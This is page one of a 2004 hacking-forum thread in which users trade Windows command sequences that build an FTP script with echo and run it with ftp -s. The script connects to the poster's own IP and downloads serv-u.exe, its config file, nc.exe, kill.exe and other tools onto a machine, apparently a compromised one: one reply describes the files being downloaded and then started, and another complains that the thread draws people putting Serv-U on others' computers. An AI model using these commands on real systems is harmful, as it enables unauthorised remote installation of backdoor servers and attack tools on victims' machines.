Forums: Echo Commands - Forums

Jump to content

  • (3 Pages)
  • +
  • 1
  • 2
  • 3
  • You cannot start a new topic
  • You cannot reply to this topic

Echo Commands echo commands

#1 User is offline   x1` 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 409
  • Joined: 15-December 03

Posted 30 March 2004 - 08:27 AM

i used to have a file with all the echo commands that u do to send tthe files from a ftp
but deleted by accident
echo open ip port >> file.txt
is that correct
echo user >> file.txt
echo password >> file.txt
whats the rest?
0

#2 Guest_axoaxo_*

  • Group: Guests

Posted 30 March 2004 - 08:37 AM

so it looks like that

echo open ip port > c:\ftp.txt
echo user username >> c:\ftp.txt
echo pw >> c:\ftp.txt
echo type binary >> c:\ftp.txt is not a must :)
echo get file.exe >> c:\ftp.txt
echo bye >> c:\ftp.txt
0

#3 User is offline   ThEWaTcHeR 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 98
  • Joined: 20-August 03

Posted 30 March 2004 - 08:38 AM

echo lcd folderwherethefileshouldupload>>
echo get file1>>
echo get file2>>
echo bye>>
0

#4 User is offline   ThEWaTcHeR 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 98
  • Joined: 20-August 03

Posted 30 March 2004 - 08:39 AM

lol axoaco :)

same post-time :)
0

#5 User is offline   x1` 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 409
  • Joined: 15-December 03

Posted 30 March 2004 - 08:39 AM

yes but then i need the command to connect to the ftp
something like
echo ftp.txt s:C or something
anyone know
so it logs in to my ftp
0

#6 User is offline   x1` 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 409
  • Joined: 15-December 03

Posted 30 March 2004 - 08:44 AM

this is what i ment ;)


ECHO open 12.12.12.12 >> ftp.txt open a ftp connection to your IP (replace 12.12.12.12 with your IP)
ECHO username >> ftp.txt ftp username
ECHO password >> ftp.txt ftp password
ECHO get serv-u.exe >> ftp.txt download files.....
ECHO get servudaemon.ini >> ftp.txt download files.....
ECHO get nc.exe >> ftp.txt download files.....
ECHO get tlist.exe >> ftp.txt download files.....
ECHO get kill.exe >> ftp.txt download files.....
ECHO get avk.exe >> ftp.txt download files.....
ECHO bye >> ftp.txt disconnect ftp connection

ftp.exe -s:c:\ftp.txt
0

#7 User is offline   arn0ld 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 98
  • Joined: 28-February 04

Posted 31 March 2004 - 05:20 AM

i'm using :


echo open ip port >> *.txt
echo user >> *.txt
echo pass >> *.txt
echo BINARY >> *.txt
echo get bla.bla >> *.txt
echo get bla.bla >> *.txt
echo quit >> *.txt
ftp.exe -s:*.txt
0

#8 Guest_axoaxo_*

  • Group: Guests

Posted 31 March 2004 - 05:25 AM

the way of Dickybob20 is better and this way works mostly.
But there are sme mistakes. I have correct5 them.


ECHO open 12.12.12.12 port >> ftp.txt open a ftp connection to your IP (replace 12.12.12.12 with your IP)
ECHO user username >> ftp.txt ftp username
ECHO password >> ftp.txt ftp password
ECHO get serv-u.exe >> ftp.txt download files.....
ECHO get servudaemon.ini >> ftp.txt download files.....
ECHO get nc.exe >> ftp.txt download files.....
ECHO get tlist.exe >> ftp.txt download files.....
ECHO get kill.exe >> ftp.txt download files.....
ECHO get avk.exe >> ftp.txt download files.....
ECHO bye >> ftp.txt disconnect ftp connection

ftp -i -n -v -s:c:\ftp.txt
0

#9 User is offline   [eXPhase 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 196
  • Joined: 27-February 04

Posted 31 March 2004 - 05:42 AM

I always use to start the script

ftp -i -n -v -s:file.script
0

#10 User is offline   arn0ld 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 98
  • Joined: 28-February 04

Posted 31 March 2004 - 05:42 AM

the way i wrote works for me in 100% cases
unless ftp.exe doesn't exist
(sorry for my lame eng)
0

#11 User is offline   NeBoKaDnEzZaR 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 49
  • Joined: 11-March 04

Posted 01 April 2004 - 01:53 AM

Thanks a lot very usefull informations.
0

#12 User is offline   fulsik 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 27
  • Joined: 03-September 04

Posted 09 October 2004 - 10:05 PM

here

echo open 123.123.123.123 port >k.txt
echo user k>>k.txt
echo k>>k.txt
echo mget *.* >>k.txt
echo quit>>k.txt
ftp -i -n -v -s:k.txt


1st line, connects to the ip with specified port
2nd line, enters username
3rd line, enters password
4th line, mass gets every file in the dir user 'k' is sent to
5th line, obvoiusly quits
6th line, executes ftp.exe connect/read ur k.txt connect and download

it's good to make the user that ur typing to be directed to a specific dir where only ur servu files are, e.g servu.exe servudaemon.ini
and it'll download then start them.
0

#13 User is offline   Wimpie 

  • Private
  • Icon
  • Group: Members
  • Posts: 2
  • Joined: 21-January 04

Posted 04 December 2004 - 01:38 PM

fulsik, on Oct 10 2004, 06:05 AM, said:

here

echo open 123.123.123.123 port >k.txt
echo user k>>k.txt
echo k>>k.txt
echo mget *.* >>k.txt
echo quit>>k.txt
ftp -i -n -v -s:k.txt


1st line, connects to the ip with specified port
2nd line, enters username
3rd line, enters password
4th line, mass gets every file in the dir user 'k' is sent to
5th line, obvoiusly quits
6th line, executes ftp.exe connect/read ur k.txt connect and download

it's good to make the user that ur typing to be directed to a specific dir where only ur servu files are, e.g servu.exe servudaemon.ini
and it'll download then start them.

using & will reduce your copy paste work
echo open 123.123.123.123 port >k.txt & echo user k>>k.txt & etc.............
so you can put everything on 1 line
0

#14 User is offline   tibbar 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 04 December 2004 - 03:36 PM

note that only port 21 works properly on ftp.exe
If you want to read more about my security research, visit Tibbar.org
0

#15 User is offline   jubbly 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 89
  • Joined: 08-September 03

Posted 10 December 2004 - 04:21 PM

tibbar, on Dec 4 2004, 11:36 PM, said:

note that only port 21 works properly on ftp.exe


Thats not entirely true as I have used it many times with obscure port numbers.

Although this post is attracting lame people putting serv-u on peeps comps which I believe to be against forum rules posting about such crap.
0

  • (3 Pages)
  • +
  • 1
  • 2
  • 3
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting